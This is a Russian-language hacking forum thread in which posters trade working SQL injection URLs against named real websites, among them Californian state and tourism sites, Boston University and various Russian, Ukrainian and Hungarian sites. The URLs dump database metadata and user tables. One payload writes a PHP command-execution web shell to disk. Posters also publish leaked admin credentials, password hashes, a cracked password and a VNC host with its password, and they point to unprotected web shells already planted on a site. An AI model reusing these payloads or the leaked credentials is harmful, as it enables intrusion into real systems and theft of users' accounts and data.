Нашел скульку на gocalif.ca.gov с PR - 7.. Думал будут денюшки =) Не тут то было... Скульку то я нашел... Code: http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/* Mysql version - 4.1.20-log MySQL user - [email protected] MySQL database - cttc_site Экранирования кавычек нету: Code: http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'Antichat%20-%20imho%20the%20best%20(c)%20b00zy_c0d3r',5,6/* Даже права есть... Code: http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'We%20have%20every%20right',5,6+from+mysql.user/* File-priv тоже есть...проверили на /tmp/ Code: http://gocalif.ca.gov/page.php?id=-1+union+select+1,2,3,'%3C?php%20system($_GET[cmd]);%20?%3E',5,6+from+mysql.user+into+outfile+'/tmp/antichat.php'/* Но вот пути для заливки шелла я не нашел =(
http://www.bikeshop.com.ua Code: http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,user(),3,database(),5/* К сожелению базы подобрать не смог.
O_O, что ещё придумаешь?) Code: http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,concat(customers_email_address,0x3a,customers_password),3,4,5+from+customers+limit+0,1/*
http://www.bikeshop.com.ua/news.php?id=-1+union+select+1,version(),3,4,5/* права то есть, только в 4й версии тупо списка таблиц нету ------------------------- тебе сюда -
Спасиб ice1k Code: http://www.belexpocentr.ru/show.php?id=-1+union+select+1,2,3,4,5,version(),7,database(),user(),10,11,12,13,14,15,16,17,18,19,20,21/* Code: http://www.sibezrcs.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* Базы как всегда не смог подобрать... Code: http://orden.elite-games.ru/article.php?id=-1+union+select+1,2,3,4,version(),database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20/* тута ВРОДЕ бы не хавтает прав.или тупо нету баз=) Code: http://www.korsteklobor.ru/category.php?id=-1+union+select+1,2,3/* Тута я ни че не могу вывести на поля
sql Comedy Club Молдованский стайл http://www.comedy.md/residents.php?id=43' версия, как мы узнаем, пятая, что не может не радовать наши шалавливые ручки.. на сайте есть форум phpbb, стандартный префикс к таблицам у которого phpbb_, молдованские админы ничего не стали придумывать, им итак, видно, весело. находим запись пользователя с подозрительным ником admin и хеш к его паролю - 92608e8ef9fd8c3f4e896c63e0e26e79, обращаемся к passcracking.ру, милый сервис просит подождать часок-другой-пятый, идем на форум, глядим на юзера следующего за админом с менее амбициозным ником zornig, но тем не менее с правами админа. Хеш 7694f4a66316e53c8cdd9d9954bd611d уж слишком брутальный для любого админа, ибо пароль к нему просто буква q. админка по адресу нагло плюется в нашу сторону ошибкой. А жаль ведь мы уже нашли таблицу tbladmins и выловили из нее интересные вещи : 4:comedy:f682468003680f7e3add8888ce60ffa51b6a917b хеш, кстати, sha1, ну да бог с ним, все равно он нам не понадобится... конец.
Вообщем пол дня пытался подобрать имя к хоум дире, получил след результаты. пути: /etc/httpd/conf/httpd.conf - апач /var/www/html - htdocs таблица: users Code: http://www.visitcalifornia.com/page.php?id=-1+union+select+1,2,3,user_name,password,email,7,8,9,10,11,12,13,14,15+from+users+limit+0,1/* лимит в помощь админка(cms): http://gocalif.ca.gov/site/cms/index.php vnc client: host=64.160.126.137 port=5900 password=9555cd837f884713 ЗЫ Название хоум диры ппц ((
Code: http://shirley.ru/cat.php?id=-1+union+select+uname,pass+from+shir_users+limit+1,1/* cсливаем базу юзеров по 1 Code: http://www.vikinggames.hu/product.php?id=-1+union+select+1,username,password,4,email_address,6,7+from+timesheet_user+limit+0,1/* тут тож Code: http://board.kinklub.com/ind.php?pn=2&id_categ=1+union+select+1,2,3,4,5,userLogin,userPassword,8,9,10,11,12,13,14,15+from+admins/* логин: admin пасс: admin Code: http://www.fotovilag.hu/links/cat.php?id=1+union+select+1,2,user_name,4,user_password,6+from+user+limit+1,15/*&menu_id=5 С помощью лимита сливаем тамблицу юзеров...
Boston University TV Code: http://www.butv10.com/series.php?id=-1+union+select+1,convert(concat(version(),0x3a,user(),0x3a,database()),binary),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* www.bu.edu Code: http://www.bu.edu/phpbin/news/releases/display.php?id=-1+union+select+convert(concat(version(),0x3a,user(),0x3a,database()),binary),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17/*
Не знаю, что за одминку ты там искал, но уже кто-то шелл r57 залил Причем язык какой-то турецкий нах, и не запаролен он! PHP: http://www.admin.nyagan.ru/admin.php гы, еще и C99 шелл там же валяется, видимо очень модный, известный сайт))) Афигеть, шелл индонезийский, на наши сайты позарились ИНДОНЕЗИЙСКИЕ КУЛ ХАЦКЕРЫ ))))))))) ЗЫ тока забыли пароль поставить =\ ЗЗЫ прошу наших умельцев сайт пока не ломать и шелл не трогать, пусть народ поглумится...
Code: http://www.fortline.ru/page.php?id=2+union+select+1,password,3,login+from+users+limit+7,10/* admin:Y2g3Yjhh
вот так выводится Code: http://www.korsteklobor.ru/category.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),0x7a),0x7a),3/*
хостинг вроде какой-то бесплатный ) Code: http://www.ccr.ru/print.php?id=-1+union+select+1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x203a20,username,password,id),31337),31337),6,7,8,9,10,11,12+from+users/* 1933 акка
Code: http://www.ukrmusic.com.ua/rus/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,name,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/* пассы не смог вывести... ------------------------------- Code: http://www.riotinmyheart.net/fanlistings/category.php?id=1+union+select+user_login+from+wp_users/* Code: http://www.riotinmyheart.net/fanlistings/category.php?id=1+union+select+user_pass+from+wp_users/* admin:9393db8a978983f3b1bd0818eb4f6b21 Code: http://www.suplementydiety.pl/index.php?id=-1+union+select+1,username,user_password,4,5,6,7,8,9,10+from+phpbb_users+limit+1,1/* admin:35d08531d3d78614e281b191f10ac78f P.S.Подскажить какой формат етих хэшов?md5?
mydak.ru Code: http://www.mydak.ru/message.php?pid=-1'+union+select+111,222,333,444,555,concat_ws(0x3a,database(),user(),version()),7,8,9/* Вывод смотреть в исходном коде страницы в <head><meta
